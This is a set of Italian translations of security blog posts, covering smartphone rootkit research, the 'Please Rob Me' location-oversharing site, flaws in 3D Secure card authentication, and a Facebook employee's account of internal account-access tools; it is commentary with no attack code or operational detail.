Detto così, quello che Iftode e Ganapathy stanno descrivendo non pare molto diverso dai rootkit che infettano i computer desktop tradizionali. La differenza principale è che ci sono probabilmente meno opportunità, essendo più difficile, d’infettare un cellulare che, ad esempio, un computer con Windows.

Inoltre direi che il tipico utente di telefonia mobile, è meno incline ad installare applicazioni rispetto alla sua controparte di Windows e così le possibilità di successo d’ingannare l’utente a installare un’applicazione pericolosa, si può supporre che siano ancora minori.

Iftode e Ganapathy non hanno dimostrato alcun modo nuovo e rivoluzionario per aggirare l’ostacolo più grande che possano incontrare coloro che vogliano spiare uno smartphone: come sarà possibile mettere il malware sul telefono?

Se volessi veramente spiare il telefono di qualcuno, penso che sarebbe probabilmente più facile scambiare il cellulare della vittima (opportunamente modificato) con un dispositivo identico, piuttosto che fare tutto questo sforzo, senza garanzie di successo.

Certo, la minaccia dei malware sui cellulari è in crescita ma è una goccia nell’oceano, rispetto agli attacchi che colpiscono regolarmente i computer Windows. Lentamente sta diventando più grave (la recente scoperta di malware a matrice finanziaria che prende di mira gli iPhone con jailbreak ne è la prova ) e senza dubbio, in futuro, si cominceranno a vedere sempre più utenti che useranno protezioni antivirus sui loro telefoni.

Tuttavia, se fossi responsabile di garantire la sicurezza dei cellulari della mia azienda, sarei molto più preoccupato della vera minaccia alla sicurezza del personale: perdere i cellulari in taxi o in treno, piuttosto che il rischio teorico dei surveillance rootkit.

Iftode e Ganapathy hanno fatto un bel video e una bella presentazione ma non voglio perderci il sonno ancora.

Ulteriori informazioni sul tema dei rootkit per smartphone possono essere trovati nel paper che Iftode e Ganapathy hanno creato:
” Rootkit sugli smartphone: gli attacchi, le implicazioni e le opportunità” [PDF]

Fonte: Surveillance rootkits on smartphones

Il post seguente è stato tradotto, previa autorizzazione, da Graham Cluley’s blog

Gli utenti di siti come Twitter e Foursquare saranno abituati a vedere i messaggi degli amici che comunicano la propria posizione e – per induzione – che non sono in casa.

Un nuovo sito web chiamato Please Rob Me, aggrega i contenuti di Foursquare e Twitter, in modo da fornire a potenziali ladri e malintenzionati un modo facile per scoprire dove si sta sorseggiando il cappuccino e quando si può avere lasciato la casa vuota.

Sebbene presentato ironicamente come aiuto per i ladri d’appartamento, il sito Please Rob Me afferma di essere progettato con un semplice scopo in mente, aumentare la consapevolezza dei pericoli della condivisione online di troppe informazioni:

L'obiettivo di questo sito è quello di suscitare un po' di consapevolezza su questo tema e indurre le persone a riflettere come utilizzare servizi tipo Foursquare, Brightkite, Google Buzz, ecc...

L'intero sito altro non è che una pagina di ricerca Twitter camuffata. Tutti possono ottenere questo genere d'informazioni.

Ed hanno ragione: non c’è nulla su Please Rob Me che non si possa ricavare direttamente da questi siti web.

Sarà interessante vedere se Foursquare e Twitter tenteranno di bloccare Please Rob Me, dopo la pubblicità che questo servizio ha ottenuto, per impedirgli d’ottenere automaticamente i dati dai loro siti. Ma la cosa più significativa, è che tutti possiamo imparare da questo sito l’importanza di essere più attenti alle informazioni che condividiamo su Internet.

Fonte: PleaseRobMe site exposes danger of sharing too much information online

Il post seguente è stato tradotto, previa autorizzazione, dal blog Schneier on Security

Ross Anderson segnala:

Le transazioni online con carte di credito o carte di debito, vengono validate sempre più dal sistema 3D Secure, contrassegnato come “Verified by Visa” e “MasterCard SecureCode”. Attualmente, è il sistema ad autenticazione unica maggiormente utilizzato, con oltre 200 milioni di titolari registrati. Sta diventando difficile effettuare acquisti online senza essere costretti ad usarlo.

In un paper che presenterò oggi alla Financial Cryptography insieme a Steven Murdoch, analizzeremo 3D Secure. Dal punto di vista ingegneristico, fa quasi tutto sbagliato e sta diventando un grosso bersaglio per il phishing. Allora perché ha avuto un tale successo di mercato?

Molto semplicemente, ci sono forti incentivi per l’adozione. I commercianti che ne fanno uso scaricano la responsabilità per frode alle banche, che a loro volta la scaricano ai titolari della carta. I sistemi ad autenticazione unica adeguatamente progettati, come OpenID e InfoCard, non possono offrire nulla di simile. Quindi questo è l’ennesimo caso in cui l’aspetto economico della sicurezza, trionfa sulla progettazione; ma in maniera talmente aggressiva da lasciare i titolari della carta meno protetti. Concludiamo con un suggerimento in merito a ciò che le autorità di regolamentazione bancaria potrebbero fare per risolvere il problema.

Fonte: Online Credit/Debit Card Security Failures

Il post seguente è stato tradotto, previa autorizzazione, dal blog Schneier on Security

Non so se questo sia reale. Ma sembra del tutto ragionevole che tutto quanto sia su Facebook, venga memorizzato in un enorme database e che qualcuno con permessi appropriati possa accedervi e modificarlo. Ha anche senso che gli sviluppatori ed altre persone, abbiano la necessità di assumere l’identità di chiunque.

Rumpus: Hai accennato, prima, ad una password principale, che non è più utilizzata.

Dipendente: Non so esattamente quando il suo uso sia stato disapprovato, ma avevamo una master password; tale da poter digitare l’user ID di qualsiasi utente e successivamente questa password. Non ho intenzione di dare la password esatta. Ma usando lettere maiuscole e minuscole, simboli, numeri e tutto il resto, era ‘Chuck Norris,’ più o meno. Era fantastico.

Rumpus: Era accessibile a tutti i dipendenti Facebook?

Dipendente: Tecnicamente, sì. Ma è stata più o meno limitata ai soli ingegneri originari, in fondo le uniche persone che ne fossero a conoscenza. Non poteva accadere che persone scelte a caso, delle risorse umane ad esempio, avessero potuto utilizzare la password per accedere ai profili. È stata creata e progettata per motivi tecnici. Ma era lì e tutti i dipendenti avrebbero potuto trovarla, se avessero saputo dove cercare.

Devo dire, inoltre, che era utilizzabile solo internamente. Se avessi voluto accedere da un liceo o da una libreria, non avrei potuto usarla. Si doveva essere nell’ufficio Facebook ed utilizzare l’ISP Facebook.

Rumpus: Pensi che i dipendenti Facebook abbiano mai abusato del privilegio di avere un accesso universale?

Dipendente: Per quanto ne so, è successo in passato, visto che almeno due persone sono state licenziate.

[...]

Dipendente: Vedi, il fatto è che – e non so quanto tu ne sappia – è tutto memorizzato in un database sul backend. Letteralmente tutto. I messaggi vengono memorizzati in un database, che siano stati eliminati o meno. Quindi interrogando il database, possiamo consultarlo facilmente senza mai accedere al tuo account. Questo è ciò che molte persone non capiscono.

Rumpus: Quindi la master password è sostanzialmente irrilevante.

Dipendente: Sì.

Rumpus: È solo un vezzo.

Dipendente: Esatto. Ma non è più usata. Come ho già accennato, abbiamo dato un giro di vite ultimamente; ma è stata sostituita da uno strumento veramente fantastico. Se, ad esempio, visito il tuo profilo sulla nostra rete interna trovo un tasto ‘cambia accesso’. Facendo un semplice clic, spiegando perché mi stia autenticando tramite il tuo account e poi confermando con ‘OK’, ecco, sono te. Si può fare finché si fornisce una spiegazione, visto che è sempre meglio esser in grado di motivarla. Ad esempio, se si sta indagando su un account compromesso, è necessario essere effettivamente in grado di accedere a tale account.

Rumpus: l manager ti stanno veramente col fiato sul collo, ogni volta che ti autentichi come qualcun altro?

Dipendente: No, ma se salta fuori, è meglio essere in grado di giustificarlo. O vieni licenziato.

Rumpus: Cos’hanno fatto?

Dipendente: So che uno di loro è entrato ed ha modificato i dati di altre persone, ha cambiato le loro opinioni religiose, o qualcosa di simile. Non ricordo esattamente cosa fosse, ma è stato fatto rapporto, scoperto e licenziato.

Fonte: Privacy Violations by Facebook Employees